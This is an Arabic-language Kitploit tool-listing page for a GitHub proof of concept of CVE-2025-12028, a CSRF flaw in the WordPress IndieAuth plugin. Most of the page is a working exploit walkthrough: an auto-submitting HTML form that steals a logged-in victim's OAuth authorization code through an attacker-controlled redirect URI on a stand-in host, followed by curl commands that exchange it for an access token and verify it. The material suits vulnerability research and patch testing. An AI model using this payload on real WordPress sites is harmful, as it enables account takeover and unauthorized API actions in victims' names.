Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-12028 — استغلال لإثبات المفهوم لثغرة CVE-2025-12028 يُظهر سرقة رمز OAuth عبر هجوم CSRF في ملحق IndieAuth لووردبريس، مما يُمكّن من الوصول غير المصرح به إلى API باستخدام بيانات الاعتماد المسروقة. | Kitploit
أدوات/GitHubGitHub/jfriedli/cve-2025-12028
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقة
GitHubjfriedli/cve-2025-12028

CVE-2025-12028

استغلال لإثبات المفهوم لثغرة CVE-2025-12028 يُظهر سرقة رمز OAuth عبر هجوم CSRF في ملحق IndieAuth لووردبريس، مما يُمكّن من الوصول غير المصرح به إلى API باستخدام بيانات الاعتماد المسروقة.

عرض المستودع
7منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

1) بدء خادم HTTP بسيط لاستضافة صفحة إثبات المفهوم

mkdir -p /tmp/attacker && cd /tmp/attacker
php -S 127.0.0.1:8000

2) إنشاء ملف /tmp/attacker/poc.html بالمحتوى التالي

<!doctype html>
<html>
  <body>
    <form id="x" method="post" action="http://localhost/wordpress/wp-login.php?action=indieauth">
      <input name="client_id" value="http://attacker.local/app">
      <input name="redirect_uri" value="http://127.0.0.1:8000/cb">
      <input name="state" value="csrf-12345">
      <input name="response_type" value="code">
      <input name="scope[]" value="create">
      <input name="scope[]" value="update">
      <input name="scope[]" value="delete">
    </form>
    <script>
      document.getElementById('x').submit();
    </script>
  </body>
</html>

3) تشغيل إثبات المفهوم في جلسة متصفح مسجل الدخول

أثناء تسجيل الدخول إلى:

http://localhost/wordpress

افتح:

http://127.0.0.1:8000/poc.html

في نفس جلسة المتصفح.


4) ملاحظة إعادة التوجيه للتفويض

سيقوم المتصفح بما يلي:

  • إرسال POST إلى نقطة نهاية IndieAuth مع ملفات تعريف الارتباط الخاصة بالضحية
  • استلام رمز تفويض
  • إعادة التوجيه إلى:
http://127.0.0.1:8000/cb?code=...&state=csrf-12345

5) استبدال الرمز برمز وصول

curl -sX POST "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -d "grant_type=authorization_code" \
  -d "code=PASTE_CODE_FROM_STEP_4" \
  -d "client_id=http://attacker.local/app" \
  -d "redirect_uri=http://127.0.0.1:8000/cb"

6) ملاحظة استجابة الرمز

ستحتوي استجابة JSON على حقول مثل:

  • access_token
  • scope
  • me
  • (قد) refresh_token

يمكن الآن استخدام هذا الرمز للتصرف كالضحية ضمن النطاقات الممنوحة.


7) التحقق من الرمز

TOKEN="PASTE_ACCESS_TOKEN"

curl -s "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -H "Authorization: Bearer $TOKEN"
تنزيل الأداة